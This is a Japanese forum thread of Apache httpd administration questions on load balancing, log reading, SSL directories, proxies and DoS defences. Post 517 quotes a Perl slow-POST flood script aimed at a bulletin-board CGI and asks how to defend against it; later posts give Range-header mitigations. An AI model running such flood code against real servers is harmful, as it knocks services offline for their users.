428 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/17(金) 17:46:15 ]: > NULL文字
これだけで、超初心者とわかるから報告しなくて良いよ。

> NULL文字列
更笑
429 名前：名無しさん＠お腹いっぱい。 [2010/12/19(日) 13:48:05 ]: loadbalancerってapacheのmod_proxy_balancerとipvsadmってどっちがいいの？
430 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/19(日) 14:51:28 ]: >>429
用途が違う
431 名前：名無しさん＠お腹いっぱい。 [2010/12/19(日) 18:26:06 ]: >>430
kwsk
432 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/19(日) 18:31:09 ]: >>431
少しはググれよ
433 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/20(月) 09:27:50 ]: 知らないなら黙ってろよ
434 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/21(火) 02:35:23 ]: >>431
レイヤー
435 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/21(火) 04:07:45 ]: 適等なことを書き散らかせばいい
436 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/22(水) 05:10:02 ]: mod_proxyとLVSを比較して「どっちがいいの？」というような質問をするということは
冗長化や負荷分散に関してほとんど知識がない人ということだから、推奨するとすればmod_proxyのほうでしょう
もっといえばmod_proxyを使いこなすのは難しいでしょうから、おすすめとしてはpoundです
437 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/22(水) 10:18:51 ]: いや、そういう人へのオススメは「アウトソースしろ」でしょ。
438 名前：名無しさん＠お腹いっぱい。 mailto:sage [2010/12/22(水) 10:25:20 ]: コンサルタントを雇いましょう。
439 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/01/20(木) 23:46:47 ]: mod_pythonをいれてpythonを動かしいます。
httpd.confで
PythonHandler test
にして、test.pyを動かしているのですが、このようにファイル名をいちいち指定しないで動かすにはどうしたらいいでしょうか？
440 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/01/21(金) 02:50:34 ]: mod_rewrite
441 名前：名無しさん＠お腹いっぱい。 [2011/01/23(日) 18:47:18 ]: 質問です。
Apacheのaccess_logの見方についてですが、以下の304はなんと表現するのが正しいのでしょうか？

xxx.xxx.xxx.xxx - test [23/Jan/2011:18:16:15 +0900] "GET /test.css HTTP/1.1" 304 -

順番に
アクセスしてきた相手のIPアドレス
認証があった場合に使用されたユーザID
アクセスされたサーバ時刻
GETはリクエストヘッダー、GET方式での呼び出し
/test.cssはファイル名、
HTTP/1.1はプロトコルバージョン
304は・・・？？

よろしくお願いします。
442 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/01/23(日) 18:51:47 ]: HTTPステータスコード
443 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/01/23(日) 18:54:14 ]: もしかして304ってキャッシュ呼び出しですかね？
例えば304のかわりに200で後ろが-でなく数値があれば、リクエスト通って、実際に送出したデータ量(バイト)

という認識でOKですよね。自己解決しました
444 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/01/23(日) 18:57:13 ]: なぜ規格書(RFC)にあたらないのだ? 死んだ曾々爺さんの遺言か?
445 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/01/24(月) 11:51:23 ]: 遺言のことよくご存知ですね。
そうなんですよ。
446 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/02/11(金) 12:16:18 ]: grep MSIE access_log | sed -e 's/.*$MSIE [0-9\.]*$.*/\1/' | sort | uniq -c | sort -rn
447 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/17(木) 18:20:00.70 ]: 自宅サーバで動的DNSをしていると
再起動したあとにIPアドレスが変わり名前と違うようになるみたいで
apacheが立ち上がったときに https だけがこけています。(httpはOK)

その後落ち着いてから apache を再起動すると https もうまく起動します。
これを最初から https もこけずに起動できるようにするにはどうすればよいでしょうか。
448 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/17(木) 18:35:59.29 ]: ちょっと sleep してから上げる、とか。
449 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/17(木) 18:37:38.43 ]: pppのリンクアップでrestartとかどーよ？
450 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/17(木) 18:52:24.06 ]: ServerName書くだけで済むんじゃね。
451 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/17(木) 18:53:23.39 ]: IPv4ならNATで内部用固定アドレスに向かわせて
Apacheはその固定アドレス:443をListenさせるとかｗ

IPv6はどう対処させようか。
サーバなのにtempaddrで運用するってのもアレだけどｗ
452 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/17(木) 18:54:54.93 ]: 笑うほどのことか？
453 名前：447 mailto:sage [2011/03/17(木) 19:07:02.36 ]: ServerName をかくといけたようです。様々なアイデアありがとうございました!
454 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/03/24(木) 00:54:18.21 ]: 【2ch激論】ダム板が統合・廃止へ！人気スレ「また騙されてダム板に…」がなくなる？
kamome.2ch.net/test/read.cgi/river/1299720645/
455 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/04/23(土) 20:14:19.39 ]: apache 1.3系の頃はBASIC認証の失敗時にも
ログにそのユーザ名が記録されていたんだけど
2.2系に変更したら失敗時は"-"と記録されるようになった。
2.2でも1.3のようにログすることってできないかな?
456 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/04/25(月) 01:52:04.73 ]: >>455
マジで？そうだとすると、マニュアルに書いてあることが間違ってるね

httpd.apache.org/docs/2.2/mod/mod_log_config.html
>リモートユーザ (認証によるもの。ステータス (%s) が 401 のときは意味がないものである可能性がある)
457 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/04/25(月) 21:21:40.24 ]: 2.2.17 で試してみたけど、そんなことない。
ユーザにプロンプトが出る前に一回 401 が返るけどそのログと見間違えてる？
mod_log_config.c の log_remote_user を見ても、- になるのは NULL のときだよ。
458 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/04/25(月) 22:55:22.44 ]: >>456
うん、マニュアルと一致しなくておかしいなぁ、と思ってた。

>>457
う～ん、なんでだろう。見間違いはないんだけよね。
でもうち以外では挙動が違うってのはうれしい情報。
もうちょっと調べてみる。
459 名前：名無しさん＠お腹いっぱい。 [2011/05/10(火) 12:06:13.87 ]: 質問させてください。
apacheのプロセス番号からアクセスしているURLを調べることってできますでしょうか？
ご教示いただけると幸いです。
460 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/10(火) 12:28:09.56 ]: mod_status
461 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/10(火) 23:43:44.84 ]: strace
462 名前：忍法帖【Lv=4,xxxP】 [2011/05/17(火) 13:18:40.00 ]: ErrorDocument 404 /usr/home/foo/bar/404.html
のように、ローカルの絶対パスで指定ってできないんでしょうか？

環境httpdバージョン2.2
463 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/17(火) 13:23:28.77 ]: できるよ。
464 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/17(火) 13:24:02.24 ]: あ、だめか。
httpd.apache.org/docs/2.2/ja/mod/core.html#errordocument
465 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/17(火) 23:46:14.18 ]: >>462
先に
Alias /404.html /usr/home/foo/bar/404.html
すればよくね？
466 名前：忍法帖【Lv=4,xxxP】 [2011/05/18(水) 05:00:26.65 ]: >>465
そうやるしかなさそうですね。ありがとございます。
467 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/22(日) 23:13:08.31 ]: >>459
モジュール内部でgetpidとrequest_recみてやればいい。
468 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/25(水) 15:58:06.65 ]: 質問です。
マルチポストすみません。

以下の設定が前提です。

■ ディレクトリ構成（一部抜粋）
/var/www/hoge
/var/www/hoge/hage
/var/www/hoge/hage/hige

■ httpd.conf（一部抜粋）
DocumentRoot /var/www/html

Alias /hage /var/www/hoge/hage
<Directory "/var/www/hoge/hage">
SSLRequireSSL
ErrorDocument 403 "SSL Require -> https://"
AllowOverride All
Order allow,deny
Allow from all
</Directory>

【やりたいこと】
ディレクトリ /hage「だけ」に SSL をかけたいです。

【こまっていること】
上記設定ですと、/hage/hige にも SSL がかかってしまいます。
/hage にだけ SSL をかけることはできますでしょうか？
（そもそもの設定が間違っている可能性大ですが）
よろしくお願いいたします。
469 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/25(水) 16:04:36.04 ]: マルチポストはしないでください。
470 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/27(金) 21:19:19.24 ]: VirtualHostを複数立てて、どれのServerNameにもマッチしないときには
一番上に書いたものにマッチするそうですが、これを拒否する方法はありますか？
471 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/27(金) 21:34:58.88 ]: 一番上で拒否すればええやん
472 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/31(火) 11:34:45.66 ]: /home/test/public_html/ ディレクトリと
/home/test/admin/test.cgi というファイルがあってこのtest.cgiを
実行させたいんですが、以下のようにすると client denied by server
configuration で動きません。

<VirtualHost 123.123.123.123:80>
DocumentRoot /home/test/public_html
ServerName www.test.com
ScriptAlias /ugoke/ "/home/test/admin/"
</VirtualHost>

/home/test/public_html/test.cgi に置くと問題なく動くんですが
ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか？

Apache1.3系だと上のような設定で動いているんですが・・・
今は2.0.64です。
473 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/31(火) 11:42:53.97 ]: > ScriptAliasはDocumentRootの下を指定しないといけないんでしょうか？
そんなことはない。注意事項がマニュアルに書いてある。
マニュアルも読まない奴はサーバー管理しちゃいけないというトラップ。
474 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/05/31(火) 12:38:12.94 ]: ホントだ・・・ScriptAliasの箇所だけみてた。
ありがつ。
475 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/02(木) 20:11:56.10 ]: microformatsのrel-tagを使うためにはapahceで何か設定が必要ですか？
ググっても何も出てこないよ
476 名前：忍法帖【Lv=3,xxxP】 [2011/06/03(金) 15:35:07.41 ]: age
477 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/03(金) 23:19:38.09 ]: HTMLでそう書けばいいだけの話なのでApacheは関係してこないと思うが。
478 名前：240 [2011/06/04(土) 13:40:48.27 ]: 　　　　　　　＿＿＿_
　　　　　　／　　　　＼
　　　　　／　 _ノ　ヽ､_　＼
　　　／　oﾟ⌒　　　⌒ﾟo　＼　今日もまた、
　　　 |　　　　（__人__）　　　　|　　/usr/local/apache2/bin/apachctl start
　　　＼　　　｀ ⌒´ 　　／　　　を打ち間違える仕事が始まったお…
479 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/04(土) 21:06:20.75 ]: >>477
HTMLで記述してもうまく動かないからサーバーの方に問題があるのかと思いまして・・・
480 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/05(日) 00:33:34.28 ]: >>479のおつむに問題があるのは確かだな
481 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/06(月) 20:24:12.23 ]: debianでapache2をインストール後間違ってapache2を削除してしまい、再度インストールしようとすると
｢Sub-process /usr/bin/dpkg returned an error code｣
と出てしまいます。
どうしたら再インストール出来るか教えてください。
482 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/06(月) 20:28:52.63 ]: でびあんから再インストールすれば良いよ。
483 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/06(月) 20:41:33.54 ]: >>482
1から設定しなおすのが大変なので他にないでしょうか?
484 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/06(月) 21:12:18.11 ]: あるだろうけど、適切な場所で質問しなけりゃ解は得られないだろうね。
485 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/06(月) 23:00:39.10 ]: たぶん479=481
486 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/08(水) 21:01:28.15 ]: apacheとmod_wsgiでアプリケーションを動かしています。
ログイン情報などをsessionで保存しているのですが、これを一度クリアすることってできますか？
487 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/10(金) 06:07:56.31 ]: >>481
その an error code がなんなのかわからないと答えようがないと思うが。
488 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/10(金) 11:27:48.64 ]: Debian 限定の話は Debian スレへ。
489 名前：名無しさん＠お腹いっぱい。 [2011/06/16(木) 04:07:49.48 ]: スレ違いかもしれませんがmod_Jkのフェイルオーバについて知っている方がいたら教えてください。
Webサーバ2台、APサーバ2台で構成しており、workers.propertiesは
以下のものがWebサーバ2台ともに入っています。

===
worker.list=wlb

worker.w1.type=ajp13
worker.w1.host=192.168.0.201
worker.w1.port=8009
worker.w1.redirect=w2

worker.w2.type=ajp13
worker.w2.host=192.168.0.202
worker.w2.port=8009
worker.w2.activation=disable

worker.wlb.type=lb
worker.wlb.balance_workers=w1,w2
worker.wlb.sticky_session=True
===

w1がダウンし続けた場合、mod_jkは定期的にw1にリクエストを送り、失敗したのちまたw2にフェイルオーバするという仕様になっているのでしょうか？
recovery_optionの設定も見たのですが、デフォルトが0ということでこの場合にどのような動作になるのかがわかりません。

環境は以下の通りです。
Fedora12
Apache2.2
mod_jk1.2.30

よろしくお願いいたします。
490 名前：名無しさん＠お腹いっぱい。 [2011/06/22(水) 22:02:32.13 ]: mod_rpaf がダウンロードできなくなってるんだけど、
stderr.net/apache/rpaf/download/mod_rpaf-0.6.tar.gz
誰かミラー知ってる人いませんか？
491 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/24(金) 18:13:00.70 ]: 見つからないね。
違ってると思うけど、mod_extract_forwarded ではダメ？・・・だよね
492 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/24(金) 18:50:42.93 ]: みっけ
ftp://ftp.freebsd.org/pub/FreeBSD/ports/distfiles/mod_rpaf-0.6.tar.gz
493 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/25(土) 10:20:58.37 ]: おー　頭いいな
494 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/06/25(土) 10:49:30.95 ]: 検索してたら ports の Makefile が引っかかったから、
どっかにあると思ってたけど 492 さんには本当に感謝。
自分も昨日から急遽 source が必要になったから焦ってた。
495 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/04(月) 18:37:48.03 ]: mod_rewriteの設定数に上限はありますでしょうか
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-d
RewriteCond %{DOCUMENT_ROOT}/%{REQUEST_FILENAME} !-f
RewriteRule ^/item/(.*)\.html /item/detail.php?id=$1 [P,QSA,NE,L]

このような設定がサイトごとに３つあり、１０サイト稼働しています
サイトを増やしたところ$1が空でした
ログを見ると条件にマッチしてましたが、$1が空になってしまうのです
他のサイトを一時的に消したところ、なぜか期待通りの動きになりました
apacheのバージョンは2.2.9です
何かお分かりになりますでしょうか
496 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/04(月) 19:33:55.08 ]: mod_rewriteってのはそれ以外の手段がまったくない場合にかぎって
しかたなく使うのが許されるウンコであって、
それを通常運用としてしまうのはウンコ以下。
ウンコの限界を極めるウンコ仕事をするよりも、
ウンコを使わないで済むようにスクリプトの方を修正した方がいい。

具体的には、
AliasMatch ^/item/.*\.html /item/detail.php
として、呼ばれたURLから.*の部分を拾うようdetail.phpを書き換える。
497 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/09(土) 01:11:49.14 ]: Apache2.2を使って、ホワイトリスト型のフォワードプロキシ
(事前に指定したサイトしかアクセスできないように設定)
を作ろうとしているのですが、設定が上手くいかないです。

下記、例としてyahooおよびgoogleのみアクセスを許可して、
それ以外のサイトをアクセス拒否させる目的で設定しましたが、
一番上のアクセス拒否の設定が優先されてしまうため、
全てのサイトへのアクセスが拒否されてしまいます。

●現在の設定例(一部抜粋)
<Proxy *>
Order deny,allow
Deny from all
</Proxy>

<Proxy www.yahoo.co.jp/*>
Order allow,deny
Allow from all
</Proxy>

<Proxy www.google.co.jp/*>
Order allow,deny
Allow from all
</Proxy>

上記、あて先がyahooとgoogleのみアクセス許可して、
それ以外のサイトへのアクセスを拒否したいのですが、
Apache2.2でそれを行う方法はあるのでしょうか？
（configの記載順による優先順位の問題でしょうか？）

上記、わかる方がいれば、教えていただけると助かります。
よろしくお願いいたします。
498 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/23(土) 18:08:53.11 ]: ApacheのMPM改造したいんだけど。具体的には、バーチャルホストごとに帯域制御をしたい
参考になるサイトとかって無いかな。もしくは、やったことある人いる?
499 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 00:56:01.27 ]: ApacheってDos攻撃対策大丈夫なの?
500 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 10:34:15.19 ]: というと?
501 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 11:36:01.87 ]: Apache自身にやらせたいならmod-dosdetector
502 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 12:44:00.71 ]: ソースコード見る限り、mod_evasiveとかmod_dosdetectorとかだと弱いんだよ。
相手からのリクエストを読んでから、遮断するから。

相手が接続だけして、何もデータを送ってこないと接続数がふくれあがるはず。実験してないけど
しかも、遮断する前にスレッドなりプロセスなりを割り当てるから、リソースが無駄。

本来は、acceptした時点でIPアドレスがわかるわけだから、それを振り分ける前に遮断するべき
503 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 13:08:54.97 ]: それはファイヤーウォールの仕事では
504 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 13:29:08.34 ]: その手があったか。ありがとう
505 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 14:18:19.69 ]: httpd.apache.org/docs/trunk/misc/security_tips.html#dos
506 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 18:05:28.86 ]: なんか無知な学生がレポート書きの手伝いを求めてるようなふいんきだな
507 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/24(日) 20:34:50.64 ]: >>506
そんな感じですね。

ぼんやりしたやり取りがたまらないｗ
508 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 00:12:09.07 ]: うちは帯域制御はmod_cband
DoS対策はmod_security
CentOS5.x/Apache2.2.xで安定して使ってるよ
509 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 00:22:08.76 ]: たまに刺さってmod_cbandが発狂するので、一時間に一回再起動させて運用してるよ。。
なんか帯域カウンターが戻らなくて溜まってしまう感じ
510 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 01:21:57.68 ]: >>509
バグ報告すれば?それかソースコード自分で見れば?
モジュール単体なら、そんなに量多くないから分かるはず

>>505
d.hatena.ne.jp/dayflower/20081029/1225266220
ここを参考mpmのソース見ると、ヘッダーを読み込んだあとにしかモジュールのフックをかけられない構造になってる。
だから、mpm改造しちゃえばできるんだけど。モジュール化の意味合いが薄まるから汚いかなって
511 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 01:24:03.92 ]: >>505
不完全なのは知ってのことなのか。世界の誰か頑張れよ
俺がもっといいmpm作ろうかな。性能がよければ有名になれるかなwww
512 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 02:28:49.74 ]: 分離してうまく作れるんじゃないかとあれこれ試行錯誤するが
結局のところモジュール本体に改造を入れることって多いよね。。。
513 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 03:15:04.58 ]: >>511
だったら作って有名になってみればいいじゃんｗ
514 名前：509 mailto:sage [2011/07/25(月) 10:37:52.60 ]: ソースは追いかけて何処の変数がインクリメントしっぱなしかは確認したけど
複数プロセスで共有してる奴で、どっかで突然死するプロセスが居ればさもありなんて感じ
発生頻度も週一くらいで、何台かで回してるサービスだし面倒
515 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/07/25(月) 11:56:14.21 ]: 2.4 に mod_ratelimit ってのが入るので、先取りしてバージョン上げちゃえ。
516 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/04(木) 07:37:37.77 ]: 449 忍法帖【Lv=40,xxxPT】 ◆8huU.uGZBA sage 2011/08/03(水) 15:02:01.85 ID:49.133.48.168 0
サーバへにリクエストが来た時、リクエストを受け取るまでhttpdは待っているわけだ
しかしcontentslength分だけ受け取りたいけど待てど暮らせど送ってこないから
httpd.confのtimeoutするまでそのhttpdプロセスがブロックされるんだな
そしてそれがたーくさんたまる、売り切れまで溜まる
売り切れたらそれ以降のhttpの要求は受け付けなくなる

攻撃がやんだらブロックされているhttpdは順次timeoutで開放され
だんだんいつもの状態に近づく

こうなんじゃないかな?

456 ◆IOT1IIO1ILUU-さる♪ sage 2011/08/03(水) 15:06:18.97 ID:219.106.108.87 0
>>449
大体はそんな感じです。
少し違うのは、Content-Lengthは関係ありません。
中途半端なHTTPリクエストであってもApacheが律儀にTCPのタイムアウトまでリソースを確保して待ってしまうのが原因なので、
それこそTCPで何か少しでもデータを送ってやれば、HTTPリクエストとして完全に破綻していてもApacheは落ちます。
なのでHTTPのヘッダに着目して対策するのは無理です。
517 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/04(木) 07:39:45.57 ]: こんな感じなんだけどどうやったら対策できる？
攻撃元のスクリプトは以下

433 名無しさん＠お腹いっぱい。 sage 2011/08/03(水) 14:51:01.84 ID:81.94.203.180 0
スクリプト自体はマルチスレッドでBBS.CGIを叩くだけなんだよな
こんな感じで

my $ref = sub{
while(){
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname( 'tcp'));
connect(SOCK, sockaddr_in("80", $ipaddr));
select(SOCK);
$|=1;
select(STDOUT);

print SOCK "POST /test/bbs.cgi HTTP/1.1\r\n";
print SOCK "Accept: */*\r\n";
print SOCK "Referer: $sv" . "/news/\r\n";
print SOCK "Accept-Language: ja,en;q=0.5\r\n";
print SOCK "Content-Type: application/x-www-form-urlencoded\r\n";
print SOCK "Accept-Encoding: gzip, deflate\r\n";
print SOCK "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows XP)\r\n";
print SOCK "Host: $sv\r\n";
print SOCK "Content-Length: 1\r\n";
print SOCK "Connection: Keep-Alive\r\n";
print SOCK "\r\n";
close(SOCK);

threads->yield();
}
};
518 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/04(木) 10:17:16.26 ]: slowloris 対策なら RequestReadTimeout で。
519 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/04(木) 10:38:02.85 ]: >>518
ありがとう
520 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/07(日) 14:40:43.49 ]: ブラウザでリクエストヘッダーに
Keep-Aliveの時間を指定した場合、どういう時間を指し示すのでしょうか？
Wikipediaを見ていてふと疑問に思いました。

Keepalive time is the duration between two keepalive transmissions in idle condition. TCP keepalive period is required to be configurable and by default is set to no less than 2 hours.
Keepalive interval is the duration between two successive keepalive retransmissions, if acknowledgement to the previous keepalive transmission is not received.

en.wikipedia.org/wiki/Keepalive
521 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/07(日) 15:23:57.31 ]: TCP keepaliveの説明を引用してくるバカがおる
522 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/07(日) 17:14:40.13 ]: ﾌｲﾀｗ
523 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/09(火) 04:00:06.70 ]: wgetで直アクセスすると404 Not Foundを返して来て、
telnetでアクセス(HEAD /some/foo/hoge.jpg HTTP/1.0)しても404を返してくるサーバがあります。
それなのに、chromeでアクセスすると画像が表示されます。

これってどういう設定なのでしょうか？
telnetやwgetでchromeと同じ結果を得るためには、どうアクセスするべきなのでしょうか？
524 名前：509 mailto:sage [2011/08/09(火) 10:40:40.07 ]: UAとかホスト名指定とかじゃあ？
525 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/10(水) 03:24:02.30 ]: Referer の制限かなあ。
Chrome で見えるって言うのは、画像の URI を直接指定して?
こちらの紳士達が詳しいかも↓
hibari.2ch.net/test/read.cgi/unix/1305422004/l50
526 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/10(水) 22:09:42.74 ]: ホスト名やリファラによる制限はブラウザと関係ないし
ユーザエージェント制限の可能性があるけどその場合は404じゃんくて403だよね
527 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/10(水) 23:46:51.84 ]: 何を返してくるかは相手次第だろうに403と決めてかかるとかｗ
528 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/11(木) 00:04:53.56 ]: 403を404エラーとして返すサーバならそうだろうけど、わざわざそうする理由があるサーバということだよね？
529 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/11(木) 10:41:31.12 ]: ErrorDocumentを指定していてその先で404にすげ替えるとか。
530 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/11(木) 12:15:38.68 ]: >>528
軽い気持ちで404返してるかも知れないのにお前は何を言ってるんだ？
531 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/11(木) 13:36:22.24 ]: 528は恥ずかしくてつい恥の上塗りでしょ
532 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/13(土) 04:50:07.44 ]: fc2とかリファラで404返してくるじゃん
533 名前：名無しさん＠お腹いっぱい。 mailto:sega [2011/08/18(木) 10:42:17.44 ]: 違うドメイン名へのアクセスをエラーにしたいんだけど
どう設定したらいいかな。

chinkoサーバに unko/ というアクセスがあったとき
200でなく404とか適切なエラーを返したい
534 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/18(木) 10:43:51.16 ]: VirtualHost
535 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/18(木) 18:25:43.83 ]: Hostヘッダーを見てはじけばいい
536 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/25(木) 21:34:02.90 ]: CVE-2011-3192
Range header DoS vulnerability Apache HTTPD 1.3/2.x

1) Use SetEnvIf or mod_rewrite to detect a large number of ranges and then
either ignore the Range: header or reject the request.

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

対策してね。
537 名前：名無しさん＠お腹いっぱい。 [2011/08/25(木) 22:01:49.96 ]: 【ニュー速ハッカー部】Apacheの脆弱性を突く「Apache Killer」　お前らのサーバの危険が危ない
hatsukari.2ch.net/test/read.cgi/news/1314272986/
538 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/25(木) 23:31:09.77 ]: 赤帽パッチまだー( ﾟдﾟ)
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192
539 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/26(金) 10:04:21.25 ]: お前らどころか2chが盛大に落とされたわけだが、他のサイトでは対策してあんのかな
540 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/26(金) 11:57:53.46 ]: 2chが盛大に落ちたんだから他の奴等はこれはヤバいwと気づいて対策するだろうよ。
問題は2chが落ちた原因が ApacheKillerだと認識されてるかどうかだが。

2ch来てない奴には通用しないかも。ニュース系サイトでの取扱い鈍いし。
541 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/26(金) 21:29:06.82 ]: >>536
それ対策なってねーぞｗ
542 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/26(金) 22:36:22.12 ]: Apache HTTPD Security ADVISORY
==============================
UPDATE 2

なんてのを用意中ぽいな
workaroundも修正されとるでぇ
ttp://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3CF0328A02-507F-42F6-A99E-EC2F30733BB7@bbc.co.uk%3E
543 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/26(金) 23:00:52.14 ]: 既にannounceに流れてた
mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3C20110826103531.998348F82@minotaur.apache.org%3E

ということで
>>536
はネタが古い
544 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/26(金) 23:50:02.78 ]: WAは検証して使えなかったから、ソース待ち
お前らちゃんと検証しろよな
545 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/27(土) 09:17:11.02 ]: >>543
あんまし困らないけどenv=bad-req-rangeの定義がないような気がする・・・。
SetEnvIf漏れ？
546 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/27(土) 09:59:14.61 ]: httpd-devはヲチっとけ
547 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 18:31:37.90 ]: LoadModuleにある、mod_authxxxxxっていっぱいあるけど、
「使ってないぞコレ」と思ったらコメントアウトしてＯＫ？

なんか気を付けることがあったらおしえてください。
548 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 18:50:36.98 ]: まずはドキュメント読みなよ。
549 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 19:00:03.08 ]: >548
一応Apacheのところを読んではいるんですが、
「××する機能」とはあるんですが、止めたら何が問題か？は書いてないですよね？

ノウハウっぽいところがあるのかな？と。
550 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 19:29:15.16 ]: 「××する機能」がいらないなら止めていいんじゃね。
551 名前：名無しさん＠お腹いっぱい。 mailto:sage [2011/08/29(月) 19:43:26.29 ]: 全部コメントアウトして、動くようになるまで追加する。
